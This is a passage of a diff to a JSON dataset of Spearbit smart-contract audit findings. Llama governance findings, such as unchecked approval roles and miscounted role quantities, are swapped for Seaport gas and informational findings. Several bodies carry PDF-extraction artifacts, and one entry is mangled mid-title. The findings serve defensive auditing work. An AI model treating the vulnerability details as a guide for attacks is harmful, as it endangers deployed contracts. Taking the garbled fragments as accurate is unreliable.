castApproval/castDisapproval doesn't check if role parameter is the approvalRole", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "A policyholder should be able to cast their approval for an action if they have the approvalRole defined in the strategy. It should not be possible for other roles to cast an action. The _castApproval method verifies if the policyholder has the role passed as an argument but doesn't check if it actually has approvalRole which is eligible to cast an approval. This means any role in the llama contract can participate in the approval with completely different quantities (weights). The same problem occurs for the castDisapproval function as well.", + "title": "invalidNativeOfferItemErrorBuffer calculation can be simplified", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "We have: func sig ------------------------------------------------------------------------------ 0b10101000000101110100010 00 0000100 0b01010101100101000100101 00 1000010 0b11101101100110001010010 10 1110100 0b10000111001000000001101 10 1000001 ^ 9th bit matchOrders matchAdvancedOrders fulfillAvailableOrders fulfillAvailableAdvancedOrders", "labels": [ "Spearbit", - "Llama", - "Severity: Critical Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Reducing the quantity of a policyholder results in an increase instead of a decrease in totalQuan- tity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "In Llama policyholder can approve or disapprove actions. Each policyholder has a quantity which represents their approval casting power. It is possible to update the quantity of individual policyholder with the setRoleHolder function in the LlamaPolicy. The _setRoleHolder method is not handling the decrease of quantity correctly for the totalQuantity. The totalQuantity describes the sum of the quantities of the individual policyholders for a specific role. In the case of a quantity change, the difference is calculated as follows: uint128 quantityDiff = initialQuantity > quantity ? initialQuantity - quantity : quantity - ,! initialQuantity; However, the quantityDiff is always added instead of being subtracted when the quantity is reduced. This results in an incorrect tracking of the totalQuantity. Adding the quantityDiff should only happen in the increase case. See: LlamaPolicy.sol#L388 // case: willHaveRole=true, hadRoleQuantity=true newTotalQuantity = currentRoleSupply.totalQuantity + quantityDiff;", + "title": "When accessing or writing to memory the value of an enum for a struct field, the enum's validation is performed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When accessing or writing to memory the value of an enum type for a struct field, the enum's validation is performed: enum Foo { f1, f2, ... fn } struct boo { Foo foo; ... } boo memory b; P(b.foo); // <--- validation will be performed to check whether the value of `b.foo` is out of range This would apply to OrderComponents.orderType, OrderParameters.orderType, CriteriaResolver.side, ReceivedItem.itemType, OfferItem.itemType, BasicOrderParameters.basicOrderType. ConsiderationItem.itemType, SpentItem.itemType,", "labels": [ "Spearbit", - "Llama", - "Severity: High Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaPolicy.revokePolicy cannot be called repeatedly and may result in burned tokens retaining active roles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama has two distinct revokePolicy functions. The first revokePolicy function removes all roles of a policyholder and burns the associated token. This function iterates over all existing roles, regardless of whether a policyholder still holds the role. In the next step the token is burned. If the total number of roles becomes too high, this transaction might not fit into one block. A second version of the revokePolicy function allows users to pass an array of roles to be removed. This approach should enable the function to be called multiple times, thus avoiding an \"out-of-gas\" error. An out-of-gas error is currently not very likely considering the maximum possible role number of 255. However, the method exists and could be called with a subset of the roles a policyholder. The method contains the following check: if (balanceOf(policyholder) == 0) revert AddressDoesNotHoldPolicy(policyholder); Therefore, it is not possible to call the method multiple times. The result of a call with a subset of roles would lead to an inconsistent state. The token of the policyholder is burned, but the policyholder could still use the remaining roles in Llama. Important methods like LlamaPolicy.hasRole don't check if LlamaPolicy.sol#L250) the token has been burned. (See", + "title": "The zero memory slot can be used when supplying no criteria to fulfillOrder, fulfillAvailable- Orders, and matchOrders", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When the external functions in this context are called, no criteria is passed to _validateAndFulfil- lAdvancedOrder, _fulfillAvailableAdvancedOrders, or _matchAdvancedOrders: new CriteriaResolver[](0), // No criteria resolvers supplied. When this gets compiled into YUL, the compiler updates the free memory slot by a word and performs an out of range and overflow check for this value: 34 function allocate_memory_() -> memPtr { memPtr := mload(64) let newFreePtr := add(memPtr, 32) if or(gt(newFreePtr, 0xffffffffffffffff), lt(newFreePtr, memPtr)) { panic_error_0x41() } mstore(64, newFreePtr) }", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Role, permission, strategy, and guard management or config errors may prevent creating/approving/queuing/executing actions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "LlamaCore deployment from the factory will only succeed if one of the roles is the BOOTSTRAP_ROLE. As the comments note: // There must be at least one role holder with role ID of 1, since that role ID is initially // given permission to call `setRolePermission`. This is required to reduce the chance that an // instance is deployed with an invalid configuration that results in the instance being unusable. // Role ID 1 is referred to as the bootstrap role. There are still several ways a user can misstep and lose access to LlamaCore. Bootstrap Role Scenarios While the bootstrap role is still needed: 1. Setting an expiry on the bootstrap role's policyholder RoleHolderData and allowing the timestamp to pass. Once passed any caller may remove the BOOTSTRAP_ROLE from expired policyholders. 2. Removing the BOOTSTRAP_ROLE from all policyholders. 3. Revoking the role's permission with setRolePermission(BOOTSTRAP_ROLE, bootstrapPermissionId, false). General Roles and Permissions Similarly, users may allow other permissions to expire, or remove/revoke them, which can leave the contract in a state where no permissions exist to interact with it. The BOOTSTRAP_- ROLE would need to be revoked or otherwise out of use for this to be a problem. Misconfigured Strategies A misconfigured strategy may also result in the inability to process new actions. For example: 1. Setting minApprovals too high. 2. Setting queuingPeriod unreasonably high 3. Calling revokePolicy when doing so would make policy.getRoleSupplyAsQuantitySum(approvalRole) fall below minApprovals (or fall below minApprovals - actionCreatorApprovalRoleQty). 1 & 2 but applied to disapprovals. And more, depending on the strategy (e.g. if a strategy always responded true to isActive). Removal of Strategies It should not be possible to remove the last strategy of a Llama instance It is possible to remove all strategies from an Ilama instance. It would not be possible to create a new action afterward. An action is required to add other strategies back. As a result, the instance would become unusable, and access to funds locked in the Accounts would be lost. Misconfigured Guards An accidentally overly aggressive guard could block all transactions. There is a built-in protection to prevent guards from getting in the way of basic management if (target == address(this) || target == address(policy)) revert CannotUseCoreOrPolicy();. Again, the BOOTSTRAP_ROLE would need to be revoked or otherwise out of use for this to be a problem.", + "title": "matchOrders, matchAdvancedOrders, fulfillAvailableAdvancedOrders, fulfillAvailableOrders re- turns executions which is cleaned and validator by the compiler", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Currently, the return values of matchOrders, matchAdvancedOrders, fulfillAvailableAdvance- dOrders, fulfillAvailableOrders are cleaned and validator by the compiler.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaPolicy.hasRole doesn't check if a policyholder holds a token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Incorrect usage of the revokePolicy function can result in a case, where the token of a policyholder is already burned but still holds a role. The hasRole function doesn't check if in addition to the role the policyholder still holds the token to be active. The role could still be used in the Llama system.", + "title": "abi.encodePacked is used when only bytes/string concatenation is needed.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the context above, one is using abi.encodePacked like the following: 35 bytes memory B = abi.encodePacked( \"\", \"\", ... \"\" ); For each substring, this causes the compiler to use an mstore (if the substring occupies more than 32 bytes, it will use the least amount of mstores which is the ceiling of the length of substring divided by 32), even though multiple substrings can be combined to fill in one memory slot and thus only use 1 mstore for those.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "Incorrect isActionApproved behavior if new policyholders get added after the createAction in the same block.timestamp", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama utilizes Checkpoints to store approval quantities per timestamp. If the current quantity changes, the previous values are preserved. The block.timestamp of createAction is used as a snapshot for the approval. (See: LlamaCore.sol#L597) Thus, in addition to the Checkpoints, the totalQuantity or numberOfHolders at the createAction are included in the snapshot. However, if new policyholders are added or their quantities change after the createAction within the same block.timestamp, they are not considered in the snapshot but remain eligible to cast an approval. For example, if there are four policyholders together 50% minimum approval: If a new action is created and two policyholders are added subsequently within the same block.timestamp. 9 The numberOfHolders would be 4 in the snapshot instead of 6. All 6 policyholders could participate in the approval, and two approvals would be sufficient instead of 4. Adding new policyholders together with creating a new action could happen easily in a llama script, which allows to bundle different actions. If a separate action is used to add a new policyholder, the final execution happens via a public callable function. An attacker could exploit this by trying to execute the add new policyholder action if a new action is created", + "title": "solc ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "solc's ABI encoder is used when OrderFulfilled is emitted in _emitOrderFulfilledEvent. That means all the parameters are cleaned and validated before they are provided to log3.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaCore delegate calls can bring Llama into an unusable state", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The core contract in Llama allows the execution of actions through a delegate_call. An action is executed as a delegate_call when the target is added as an authorizedScript. This enables batching multiple tasks into a contract, which can be executed as a single action. In the delegate_call, a script contract could modify arbitrary any slot of the core contract. The Llama team is aware of this fact and has added additional safety-checks to see if the slot0 has been modified by the delegate_call. The slot0 contains values that should never be allowed to change. bytes32 originalStorage = _readSlot0(); (success, result) = actionInfo.target.delegatecall(actionInfo.data); if (originalStorage != _readSlot0()) revert Slot0Changed(); A script might be intended to modify certain storage slots. However, incorrect SSTORE operations can completely break the contracts. For example, setting actionsCount = type(uint).max would prevent creating any new actions, and access to funds stored in the Account would be lost.", + "title": "The use of identity precompile to copy memory need not be optimal across chains", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The PointerLibraries contract uses a staticcall to identity precompile, i.e., address 4 to copy memory--poor man's memcpy. This is used as a cheaper alternative to copy 32-byte chunks of memory using mstore(...) in a for-loop. However, the gas efficiency of the identity precompile relies on the version of the EVM on the underlying chain. The base call cost for precompiles before Berlin hardfork was 700 (from Tangerine Wistle), and after Berlin, this was reduced to 100 (for warm accounts and precompiles). Many EVM compatible L1s, and even L2s are on old EVM versions. And using the identity precompile would be more expensive than doing mstores(...).", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The execution opcode of an action can be changed from call to delegate_call after approval", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "In Llama an action only defines the target address and the function which should be called. An action doesn't implicitly define if the opcode should be a call or a delegate_call. This only depends on whether the target address is added to authorizedScripts mapping. However, adding a target to the authorizedScripts can be done after the approval in a different action. The authorizedScript action could use a different set of signers with a different approval strategy. The change of adding a target to authorizedScript should not impact actions which are already approved and in the queuing state. This could lead to security issues when policyholders approved the action under the assumption the opcode will be a call instead of a delegate call.", + "title": "Use the zero memory slot for allocating empty data", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In cases where an empty data needs to be allocated, one can use the zero slot. This can also be used as initial values for offer and consideration in abi_decode_generateOrder_returndata.", "labels": [ "Spearbit", - "Llama", - "Severity: Medium Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaFactory is governed by Llama itself", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama uses their own governance system to govern the LlamaFactory contract. The LlamaFactory contract is responsible for authorizing new LlamaStrategies. We can identify several potential drawbacks with this approach. If only a single strategy contract is used and a critical bug is discovered, the implications could be significant. In such a scenario, it would mean a broken strategy contract needs to be used by the Factory governance to deploy a fixed version of the strategy contract or enable other strategies. The likelihood for this to happen is still low but implications could be critical.", + "title": "Some address fields are masked even though the ConsiderationDecoder wanted to skip this mask- ing", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "When a field of address type from a struct in memory is used, the compiler masks (also: 2, 3) it. struct A { address addr; } A memory a; // P is either a statement or a function call // when compiled --> and(mload(a_addr_pos), 0xffffffffffffffffffffffffffffffffffffffff) P(a.addr); Also the compiler is making use of function cleanup_address(value) -> cleaned { cleaned := and(value, 0xffffffffffffffffffffffffffffffffffffffff) } function abi_encode_address(value, pos) { mstore(pos, and(value, 0xffffffffffffffffffffffffffffffffffffffff)) } in a few places", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "The permissionId doesn't include call or delegate-call for LlamaAccount.execute", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The decision if LlamaAccount.execute is a delegate_call depends on the bool flag parameter withDelegatecall. This parameter is not included in the permissionId, which controls role permissions in Llama. The permissionId in Llama is calculated in the following way: PermissionData memory permission = PermissionData(target, bytes4(data), strategy); bytes32 permissionId = keccak256(abi.encode(permission)); The permissionId required for a role to perform an action only includes the function signature but not the param- eters themselves. It is impossible to define the opcode as part of the permissionId.", + "title": "div(x, (1< ds)(na + ns (cid:0) ds) is choosen so that order would not be overfilled. The parameters used in calculating (cid:15) are taken before they have been updated. Case 4. ds 6= 0, da 6= 1, da 6= ds (na, ns, da, ds) = (na (cid:0) (cid:15), na + ns (cid:0) (cid:15), ds, ds) Below (cid:15) = (nads + nsda > dads)(nads + nsda (cid:0) dads) is choosen so that order would not be overfilled. And in case the new values go beyond 120 bits, G = gcd(nads (cid:0) (cid:15), nads + nsda (cid:0) (cid:15), dads), otherwise G will be 1. The parameters used in calculating (cid:15), G are taken before they have been updated. (na, ns, da, ds) = 1 G (nads (cid:0) (cid:15), nads + nsda (cid:0) (cid:15), dads, dads) If one of the updated values occupies more than 120 bits, the call will be reverted.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Gas Optimization" ] }, { - "title": "LlamaCore doesn't check if minExecutionTime returned by strategy is in the past", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The minExecutionTime returned by a strategy is not validated.", + "title": "The magic return value checks can be made stricter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The magic return value check for ZoneInteraction can be made stricter. 1. It does not check the lower 28 bytes of the return value. 2. It does not check if extcodesize() of the zone is non-zero. In particular, for the identity precompile, the magic check would pass. This is, however, a general issue with the pattern where magic values are the same as the function selector and not specific to the Zone.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Address parsing from tokenId to address string does not account for leading 0s", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Policy tokenIds are derived from the holder's account address. The address is intended to be displayed in the svg generated when calling tokenURI. Currently, leading 0s are truncated rendering the incorrect address string: e.g. 0x015b... vs 0x0000...be60 for address 0x0000000000015B23C7e20b0eA5eBd84c39dCbE60.", + "title": "Resolving additional offer items supplied by contract orders with criteria can be impractical", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Contract orders can supply additional offer amounts when the order is executed. However, if they supply extra offer items with criteria, on the fly, the fulfiller won't be able to supply the necessary criteria resolvers (the correct Merkle proofs). This can lead to flaky orders that are impractical to fulfill.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "The ALL_HOLDERS_ROLE can be set as a force role by mistake", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "During the initialization, an array of roles that must be assigned as force approval/disapproval can be sent. The logic does not account for ALL_HOLDERS_ROLE (which is role id 0, the default value of uint8) which can be sent as a mistake by the user. This is a low issue as if the above scenario happens, the strategy can become obsolete which will render the owner redeploy the strategy with correct initialization configs. We must mention that the force roles can not be changed after they are set within the initialization.", + "title": "Use of confusing named constant SpentItem_size in a function that deals with only ReceivedItem", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The named constant SpentItem_size is used in the function copyReceivedItemsAsConsidera- tionItems, even though the context has nothing to do with SpentItem.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "LlamaPolicy.setRolePermission allows to set permissions for non existing roles", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "It is possible to set a permission for a role that doesn't exist, yet. In other functions like assigning a role to a policyholder, this check happens. (See: LlamaPolicy.sol#L343) A related issue, very close to this, is the updateRoleDescription method which can emit an event for a role that does not exists. This is just an informational issue as it does not affect with anything the on-chain logic, might affect off-chain logic if any logic will ever rely on it.", + "title": "The ABI-decoding of generateOrder returndata does not have sufficient checks to prevent out of bounds returndata reads", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "There was some attempt to avoid out of bounds returndata access in the ConsiderationDecoder. However, the two returndatacopy(...) in ConsiderationDecoder.sol#L456-L461 can still lead to out of bounds access and therefore may revert. Assume that code reaches the line ConsiderationDecoder.sol#L456. We have the following constraints 1. returndatasize >= 4 * 32: ConsiderationDecoder.sol#L428 2. offsetOffer <= returndatasize: ConsiderationDecoder.sol#L444 3. offsetConsideration <= returndatasize: ConsiderationDecoder.sol#L445 If we pick a returndata that satisfies 1 and let offsetOffer == offsetConsideration == returndatasize, all the constraints are true. But the returndatacopy would be revert due to an out-of-bounds read. Note: High-level Solidity avoids reading from out of bounds returndata. This is usually done by checking if re- turndatasize() is large enough for static data types and always doing returndatacopy of the form returndata- copy(x, 0, returndatasize()).", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "During the audit, the client discovered an issue that affects their off-chain infrastructure. The RoleAssigned event in LlamaPolicy emits the currentRoleSupply instead of the quantity. From an off-chain perspective, there is currently no way to get the quantity assigned for a role to a policyholder at Role Assignment time. The event would be more useful if it emitted quantity instead of currentRoleSupply (since the latter can be just be calculated off-chain from the former).", + "title": "Consider renaming writeBytes to writeBytes32", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The function name writeBytes is not accurate in this context.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "ETH can remain in the contract if msg.value is greater than expected", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "When an action is created, the creator can specify an amount of ETH that needs to be sent when executing the transaction. This is necessary in order to forward ETH to a target call. Currently, when executing the action the msg.value is checked to be at least the required amount of ETH needed to be forwarded. if (msg.value < actionInfo.value) revert InsufficientMsgValue(); This can result in ETH remaining in the contract after the execution. From our point of view, LlamaCore should not hold any balance of ETH.", + "title": "Missing test case for criteria-based contract orders and identifierOrCriteria != 0 case", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The only test case for criteria-based contract orders in advanced.spec.ts#L434. This tests the case for identifierOrCriteria == 0. For the other case, identifierOrCriteria != 0 tests are missing.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Cannot re-authorize an unauthorized strategy config", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Strategies are deployed using a create2 salt. The salt is derived from the strategy config itself (see LlamaCore.sol#L709-L710). This means that any unauthorized strategy cannot be used in the future, even if a user decides to re-enable it.", + "title": "NatSpec comment for conduitKey in bulkTransfer() says \"optional\" instead of \"mandatory\"", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The NatSpec comment says that conduitKey is optional but there is a check making sure that this value is always supplied.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Signed messages may not be cancelled", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Creating, approving, and disapproving actions may all be done by signing a message and having another account call the relevant *BySig function. Currently, there is no way for a signed message to be revoked without a successful *BySig function call containing the nonce of the message to be revoked.", + "title": "Comparing the magic values returned by different contracts are inconsistent", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In ZoneInteraction's _callAndCheckStatus we perform the following comparison for the returned magic value: let magic := shr(224, mload(callData)) magicMatch := eq(magic, shr(224, mload(0))) But the returned magic value comparison in _assertValidSignature without truncating the returned value: if iszero(eq(mload(0), EIP1271_isValidSignature_selector))", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "LlamaCore name open to squatting or impersonation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "When deploying a LlamaCore clone, the create2 salt is derived from the name. This means that no two may have the same name, and name squatting, or impersonation, may occur.", + "title": "Document the structure of the TypehashDirectory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Instances of TypehashDirectory would act as storage contracts with runtime bytecode: [0x00 - 0x00] 00 [0x01 - 0x20] h(struct BulkOrder { OrderComponents[2] [0x21 - 0x40] h(struct BulkOrder { OrderComponents[2][2] ... [0xNN - 0xMM] h(struct BulkOrder { OrderComponents[2][2]...[2] tree }) tree }) tree }) 56 h calculates the eip-712 typeHash of the input struct. 0xMM would be mul(MaxTreeHeight, 0x20) and 0xNN = 0xMM - 0x1f.", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Expired policyholders are active until they are explicitly revoked", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Each policyholder in Llama has an expiration timestamp. However, policyholder can still use the power of their role after the expiration has passed. The final revoke only happens after the public LlamaPolicy.revokeExpiredRole method is called. Anyone can call this method after the expiration timestamp is passed. For the Llama system to function effectively with role expiration, it is essential that external keepers vigilantly monitor the contract and promptly revoke expired roles. A final revoke exactly at the expiration can not be guaranteed.", + "title": "Document what twoSubstring encodes", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "We have: bytes32 constant twoSubstring = 0x5B325D0000000000000000000000000000000000000000000000000000000000; which encodes: cast --to-ascii 0x5B325D0000000000000000000000000000000000000000000000000000000000 [2]", "labels": [ "Spearbit", - "Llama", - "Severity: Low Risk" + "Seaport", + "Severity: Informational" ] }, { - "title": "Gas optimizations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Throughout the codebase we've identified gas improvements that were aggregated into one issue for a better management. RelativeStrategy.sol#L159 The if (disapprovalPolicySupply == 0) revert RoleHasZeroSupply(disapprovalRole); check and actionDisapprovalSupply[actionInfo.id] = disapprovalPolicySupply; can be wrapped in an if block in case disapprovals are enabled The uint128 newNumberOfHolders; and uint128 newTotalQuantity; variables are obsolete as the up- dates on the currentRoleSupply can be done in the if branches. LlamaPolicy.sol#L380-L392 The exists check is redundant LlamaPolicy.sol#L252 The _validateActionInfoHash(action.infoHash, actionInfo); is redundant as it's already done in the getActionState LlamaCore.sol#L292 LlamaCore.sol#L280 LlamaCore.sol#L672 Finding the BOOTSTRAP_ROLE in the LlamaFactory._deploy could happen by expecting the role at a cer- tain position like position 0 instead of paying gas for an on-chain search operation to iterate the array. LlamaFactory.sol#L205 quantityDiff calculation guaranteed to not overflow as the ternary checks initialQuantity > quantity before subtracting. Infeasible for numberOfHolders and totalQuantity to overflow. See also LlamaPolicy.sol#L422-L423 Infeasible for numberOfHolders to overflow.", + "title": "Upper bits of the to parameter to call opcodes are stripped out by clients", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "Upper bits of the to parameter to call opcodes are stripped out by clients. For example, geth would strip the upper bytes out: instructions.go#L674 uint256.go#L114-L121 So even though the to parameters in this context can have dirty upper bits, the call opcodes can be successful, and masking these values in the contracts is not necessary for this context.", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Unused code", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Various parts of the code is unused or unnecessary. CallReverted and MissingAdmin in LlamaPolicy.sol#L27-L29 DisapprovalThresholdNotMet in RelativeStrategy.sol#L28 Unused errors in LlamaCore.sol InvalidCancelation, ProhibitedByActionGuard, ProhibitedByStrategy, ProhibitedByStrategy(bytes32 reason) and RoleHasZeroSupply(uint8 role) /// - Action creators are not allowed to cast approvals or disapprovals on their own actions, The comment is inaccurate, this strategy, the creators have no restrictions on their actions. RelativeStrategy.sol#L19 17", + "title": "Remove unused functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The functions in the above context are not used in the codebase.", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Duplicate storage reads and external calls", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "When creating, approving, disapproving, queuing, and executing actions, there are calls between the various contracts in the system. Due to the external calls, the compiler will not cache storage reads, meaning the gas cost of warm sloads is incurred multiple times. The same is true for view function calls between the contracts. A number of these calls are returning the same value multiple times in a transaction.", + "title": "Fulfillment_itemIndex_offset can be used instead of OneWord", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the above context, one has: // Get the item index using the fulfillment pointer. itemIndex := mload(add(mload(fulfillmentHeadPtr), OneWord))", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Consider clones-with-immutable-args", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The cloned contracts have immutable values that are written to storage on initialization due to proxies being used. Reading from storage costs extra gas but also puts some of the storage values at risk of being overwritten when making delegate calls.", + "title": "Document how the _pauser role is assigned for PausableZoneController", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "The _pauser role is an important role for a PausableZoneController. It can pause any zone created by this controller and thus transfer all the native token funds locked in that zone to itself.", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "The domainSeperator may be cached", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "The domainSeperator is computed for each use. Some gas may be saved by using caching and deferring to the cached value.", + "title": "_aggregateValidFulfillmentConsiderationItems's memory layout assumptions depend on _val- idateOrdersAndPrepareToFulfill's memory manipulation", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "ceivedItem.recipient's offset of considerationItemPtr to write to receivedItem at offset (the same offset is also used here): _aggregateValidFulfillmentConsiderationItems are we In the Re- the same // Set the recipient on the received item. mstore( add(receivedItem, ReceivedItem_recipient_offset), mload(add(considerationItemPtr, ReceivedItem_recipient_offset)) ) looks buggy, This tion[i].endAmount with consideration[i].recipient: but in _validateOrdersAndPrepareToFulfill(...) we overwrite considera- mstore( add( considerationItem, ReceivedItem_recipient_offset // old endAmount ), mload( add( considerationItem, ConsiderationItem_recipient_offset ) ) ) in _fulfillAvailableAdvancedOrders and Also _validateOrdersAndPrepareToFulfill gets called first _matchAdvancedOrders. This is important since the memory for the consideration arrays needs to be updated before we reach _aggregateValidFulfillmentConsiderationItems. 59", "labels": [ "Spearbit", - "Llama", - "Severity: Gas Optimization" + "Seaport", + "Severity: Informational" ] }, { - "title": "Prefer on-chain SVGs or IPFS links over server links for contractURI", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Llama-Spearbit-Security-Review.pdf", - "body": "Llama uses on-chain SVG for LlamaPolicy.tokenURI. The same could be implemented for LlamaPolicy.contractURI as well. In general IPFS links or on-chain SVG for visual representations provide better properties than centralized server links.", + "title": "recipient is provided as the fulfiller for the OrderFulfilled event", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Seaport-Spearbit-Security-Review.pdf", + "body": "In the above context in general it is not true that the recipient is the fulfiller. Also note that recipient is 